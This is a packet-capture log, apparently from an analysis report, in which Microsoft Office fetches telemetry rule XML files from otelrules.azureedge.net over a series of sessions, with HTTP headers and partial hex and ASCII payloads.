2024-12-07 11:59:59 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.7	49827	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:59 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:59 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:59 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: fc2f82a1-a01e-006f-4f06-4813cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115959Z-r1cf579d778xq4f9hC1EWRx41g0000000250000000001zkx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:59 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.7	49828	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:59 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:59 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:59 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: e2bfbc9d-f01e-0085-0f03-4888ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115959Z-r1cf579d778qlpkrhC1EWRpfc800000002zg000000001uc8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:59 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.7	49830	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:00 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:01 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:01 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: 42c4dea6-f01e-0099-6c03-489171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120001Z-r1cf579d7788pwqzhC1EWRrpd800000002mg0000000016y3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:01 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.7	49832	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:01 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:01 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:01 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 22946db9-b01e-0021-4e03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120001Z-r1cf579d778z4wflhC1EWRa3h00000000290000000003gnu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:01 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.7	49831	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:01 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:01 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:01 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 9a7d6e1d-d01e-00a1-4e08-4835b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120001Z-r1cf579d778dndrdhC1EWR4b240000000210000000000rsm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:01 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.7	49833	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:01 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:01 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:01 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 1dad0878-201e-0071-1606-48ff15000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120001Z-r1cf579d778v97q7hC1EWRf95c00000001u0000000004635 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:01 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.7	49834	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:01 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:01 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 8332b9fd-c01e-0079-1704-48e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120001Z-r1cf579d778qlpkrhC1EWRpfc800000002z0000000002gwv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:02 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.7	49835	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:03 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:03 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: fdf36bd3-a01e-0070-1e03-48573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120003Z-r1cf579d778v97q7hC1EWRf95c00000001tg000000003ya4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:03 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.7	49836	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:03 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:03 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: a7f22c35-701e-001e-6403-48f5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120003Z-r1cf579d778t5c2lhC1EWRce3w00000002xg000000003b2v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:03 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.7	49837	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:03 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:03 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 812207fe-e01e-0099-5703-48da8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120003Z-r1cf579d778g2t6ghC1EWRfggs00000001t00000000010gh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:03 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.7	49838	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:03 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:03 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: 62ef0171-501e-000a-5a03-480180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120003Z-r1cf579d778dndrdhC1EWR4b24000000021g000000000dku x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:03 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.7	49839	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:04 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
